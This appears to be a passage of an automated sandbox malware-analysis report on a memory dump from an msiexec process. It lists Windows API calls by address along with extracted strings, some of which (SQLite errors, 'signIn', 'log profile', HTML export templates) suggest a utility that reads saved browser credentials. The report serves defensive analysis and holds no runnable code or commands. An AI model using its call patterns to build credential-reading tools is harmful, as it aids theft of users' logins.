                                                                                                      • String ID: 4$h
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                                      • String ID: 0$6
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 004082EF
                                                                                                        • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                      • memset.MSVCRT ref: 00408362
                                                                                                      • memset.MSVCRT ref: 00408377
                                                                                                      Similarity
                                                                                                      • API ID: memset$ByteCharMultiWide
                                                                                                      • String ID:
                                                                                                      APIs
                                                                                                      • memchr.MSVCRT ref: 00444EBF
                                                                                                      • memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                      • memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                      • memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                      • memcpy.MSVCRT(?,0044EB0C,0000000B), ref: 00444FAF
                                                                                                      • memcpy.MSVCRT(?,00000001,00000008), ref: 00444FC1
                                                                                                      • memcpy.MSVCRT(PD,?,00000008,?,?), ref: 00445010
                                                                                                      • memset.MSVCRT ref: 0044505E
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: memcpy$memchrmemset
                                                                                                      • String ID: PD$PD
                                                                                                      APIs
                                                                                                      • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                                                                      • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                                                                      • GetDC.USER32(00000000), ref: 00409F6E
                                                                                                      • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                                                                                      • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                                                                                      • GetWindowRect.USER32(?,?), ref: 00409FA0
                                                                                                      • GetParent.USER32(?), ref: 00409FA5
                                                                                                      • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                                                                                      Similarity
                                                                                                      • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                                      • String ID:
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: free$wcslen
                                                                                                      • String ID:
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040A47B
                                                                                                      • _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                      • wcslen.MSVCRT ref: 0040A4BA
                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                      • wcslen.MSVCRT ref: 0040A4E0
                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: memcpywcslen$_snwprintfmemset
                                                                                                      • String ID: %s (%s)$YV@
                                                                                                      APIs
                                                                                                      • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                                                                      • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                                                                      • wcslen.MSVCRT ref: 0040A6B1
                                                                                                      • wcscpy.MSVCRT ref: 0040A6C1
                                                                                                      • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                                                                      • wcscpy.MSVCRT ref: 0040A6DB
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                      • String ID: Unknown Error$netmsg.dll
                                                                                                      APIs
                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                      • wcscpy.MSVCRT ref: 0040DAFB
                                                                                                      • wcscpy.MSVCRT ref: 0040DB0B
                                                                                                      • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                                                                        • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                                      • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      • unable to open database: %s, xrefs: 0042F84E
                                                                                                      • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                                                      • database is already attached, xrefs: 0042F721
                                                                                                      • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                                                      • out of memory, xrefs: 0042F865
                                                                                                      • too many attached databases - max %d, xrefs: 0042F64D
                                                                                                      • database %s is already in use, xrefs: 0042F6C5
                                                                                                      Similarity
                                                                                                      • API ID: memcpymemset
                                                                                                      • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                      APIs
                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EB3F
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,00000000), ref: 0040EB5B
                                                                                                      • memcpy.MSVCRT(?,0045A248,00000014), ref: 0040EB80
                                                                                                      • memcpy.MSVCRT(?,0045A234,00000014,?,0045A248,00000014), ref: 0040EB94
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EC17
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(0000000C,00000000), ref: 0040EC21
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EC59
                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                        • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                        • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                        • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                        • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                                      • String ID: ($d
                                                                                                      APIs
                                                                                                      • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                                                                      • Sleep.KERNEL32(00000001), ref: 004178E9
                                                                                                      • GetLastError.KERNEL32 ref: 004178FB
                                                                                                      • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Similarity
                                                                                                      • API ID: File$ErrorLastLockSleepUnlock
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 00407E44
                                                                                                      • memset.MSVCRT ref: 00407E5B
                                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                                      • wcscpy.MSVCRT ref: 00407F10
                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Similarity
                                                                                                      • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                                                                      APIs
                                                                                                      • memcpy.MSVCRT(004032AB,&quot;,0000000C,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EB6
                                                                                                      • memcpy.MSVCRT(004032AB,&amp;,0000000A,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EE2
                                                                                                      • memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Similarity
                                                                                                      • API ID: memcpy
                                                                                                      • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                      APIs
                                                                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                                                                                                      • memset.MSVCRT ref: 00413ADC
                                                                                                      • memset.MSVCRT ref: 00413AEC
                                                                                                        • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                                                                      • memset.MSVCRT ref: 00413BD7
                                                                                                      • wcscpy.MSVCRT ref: 00413BF8
                                                                                                      • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,?), ref: 00413C4E
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Similarity
                                                                                                      • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                                      • String ID: 3A
                                                                                                      APIs
                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                      • wcscpy.MSVCRT ref: 0040D1B5
                                                                                                        • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                                                        • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                                                      • wcslen.MSVCRT ref: 0040D1D3
                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                      • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                      • memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                                                                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                                                                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                                                                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Similarity
                                                                                                      • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                      • String ID: strings
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0041249C
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
                                                                                                      • GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
                                                                                                      • LoadIconW.USER32(00000000,00000065), ref: 0041258B
                                                                                                      • wcscpy.MSVCRT ref: 004125A0
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Similarity
                                                                                                      • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                                      • String ID: r!A
                                                                                                      APIs
                                                                                                      • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                                                                      • FindResourceW.KERNEL32(00000000,00000032,BIN), ref: 0040B5B6
                                                                                                      • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                                      • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                                      • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                                      • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Similarity
                                                                                                      • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                                      • String ID: BIN
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 00411AF6
                                                                                                        • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                      • wcsrchr.MSVCRT ref: 00411B14
                                                                                                      • wcscat.MSVCRT ref: 00411B2E
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Similarity
                                                                                                      • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                                      • String ID: AE$.cfg$General$EA
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040D8BD
                                                                                                      • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                                                      • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                                                                      • memset.MSVCRT ref: 0040D906
                                                                                                      • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                                                      • _wcsicmp.MSVCRT ref: 0040D92F
                                                                                                        • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                                                        • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Similarity
                                                                                                      • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                                      • String ID: sysdatetimepick32
                                                                                                      APIs
                                                                                                      • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                                                                                      • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                                                                                      • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                                                                                      • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                                                                                      • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                                                                                      • memset.MSVCRT ref: 0041BA3D
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: memcpy$memset
                                                                                                      • String ID: -journal$-wal
                                                                                                      APIs
                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                                                                      • EndDialog.USER32(?,00000002), ref: 00405C83
                                                                                                      • EndDialog.USER32(?,00000001), ref: 00405C98
                                                                                                        • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                                                                        • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                                                                      • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                                                                      • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                                                                      Similarity
                                                                                                      • API ID: Item$Dialog$MessageSend
                                                                                                      • String ID:
                                                                                                      APIs
                                                                                                      • _wcsicmp.MSVCRT ref: 00444D09
                                                                                                      • _wcsicmp.MSVCRT ref: 00444D1E
                                                                                                      • _wcsicmp.MSVCRT ref: 00444D33
                                                                                                        • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                        • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                        • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: _wcsicmp$wcslen$_memicmp
                                                                                                      • String ID: .save$http://$https://$log profile$signIn
                                                                                                      APIs
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 00405DE1
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00405DFD
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E23
                                                                                                      • memset.MSVCRT ref: 00405E33
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E62
                                                                                                      • InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00405EAF
                                                                                                      • SetFocus.USER32(?,?,?,?), ref: 00405EB8
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00405EC8
                                                                                                      Similarity
                                                                                                      • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                      • String ID:
                                                                                                      APIs
                                                                                                      • GetClientRect.USER32(?,?), ref: 00405F65
                                                                                                      • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                                                                      • GetWindow.USER32(00000000), ref: 00405F80
                                                                                                        • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                                                                      • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                                                                      • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                                                                      • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                                                                      • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                                                                                      • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                                                                      Similarity
                                                                                                      • API ID: Window$ItemMessageRectSend$Client
                                                                                                      • String ID:
                                                                                                      APIs
                                                                                                        • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                                                        • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                                                        • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                        • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                      • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                                                                                      • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                                                                                      • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                                                                                        • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                                                                                        • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                                                                                                      • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                                                                                                      • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                                                                                      • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: memcpy$memset
                                                                                                      • String ID: gj
                                                                                                      APIs
                                                                                                      • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00430D77
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: memcpy
                                                                                                      • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                                                                      APIs
                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                                                                      • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                                                                      • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                                                                      • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                                                                      • memset.MSVCRT ref: 00405ABB
                                                                                                      • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                                                                      • SetFocus.USER32(?), ref: 00405B76
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$FocusItemmemset
                                                                                                      • String ID:
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: _snwprintfwcscat
                                                                                                      • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                      • String ID: 0$6
                                                                                                      APIs
                                                                                                        • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                                                      • memset.MSVCRT ref: 00405455
                                                                                                      • memset.MSVCRT ref: 0040546C
                                                                                                      • memset.MSVCRT ref: 00405483
                                                                                                      • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                                                                                      • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$memcpy$ErrorLast
                                                                                                      • String ID: 6$\
                                                                                                      APIs
                                                                                                      Similarity
                                                                                                      • API ID: AttributesErrorFileLastSleep$free
                                                                                                      • String ID:
                                                                                                      APIs
                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                                                      • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                                                      • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                                                      • wcscpy.MSVCRT ref: 0040A0D9
                                                                                                      • wcscat.MSVCRT ref: 0040A0E6
                                                                                                      • wcscat.MSVCRT ref: 0040A0F5
                                                                                                      • wcscpy.MSVCRT ref: 0040A107
                                                                                                      Similarity
                                                                                                      • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                      • String ID:
                                                                                                      APIs
                                                                                                        • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                      • String ID: advapi32.dll
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                                                      • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                                                      • <%s>, xrefs: 004100A6
                                                                                                      Similarity
                                                                                                      • API ID: memset$_snwprintf
                                                                                                      • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: wcscat$_snwprintfmemset
                                                                                                      • String ID: %2.2X
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: _snwprintfwcscpy
                                                                                                      • String ID: dialog_%d$general$menu_%d$strings
                                                                                                      APIs
                                                                                                      • strlen.MSVCRT ref: 00408DFA
                                                                                                        • Part of subcall function 00408D18: memcpy.MSVCRT(?,?,00000008,00000008,00000010,00000040,?,?), ref: 00408D44
                                                                                                      • memset.MSVCRT ref: 00408E46
                                                                                                      • memcpy.MSVCRT(00000000,?,?,00000000,00000000,00000000), ref: 00408E59
                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408E6C
                                                                                                      • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,?,?,00000000,?,00000000,00000000,?,00000000), ref: 00408EB2
                                                                                                      • memcpy.MSVCRT(?,?,?,00000000,?,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408EC5
                                                                                                      • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408EF2
                                                                                                      • memcpy.MSVCRT(?,00000000,00000014,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408F07
                                                                                                      Similarity
                                                                                                      • API ID: memcpy$memsetstrlen
                                                                                                      • String ID:
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: memset
                                                                                                      • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                                      APIs
                                                                                                      • _mbscpy.MSVCRT(?,00000000,00000000,?,00000001), ref: 00408F50
                                                                                                      • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,?,?,00000010,?,00000000,?,00000001), ref: 00408FB3
                                                                                                      • memset.MSVCRT ref: 00408FD4
                                                                                                      • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,00000010,?,00000000,?,00000001), ref: 00409025
                                                                                                      • memset.MSVCRT ref: 00409042
                                                                                                      • memcpy.MSVCRT(?,?,00000018,00000001,?,?,00000020,?,?,?,?,00000000,?,00000001), ref: 00409079
                                                                                                        • Part of subcall function 00408C3C: strlen.MSVCRT ref: 00408C96
                                                                                                      Similarity
                                                                                                      • API ID: memcmpmemset$_mbscpymemcpystrlen
                                                                                                      • String ID:
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 004116FF
                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                        • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                        • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                        • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                        • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                        • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
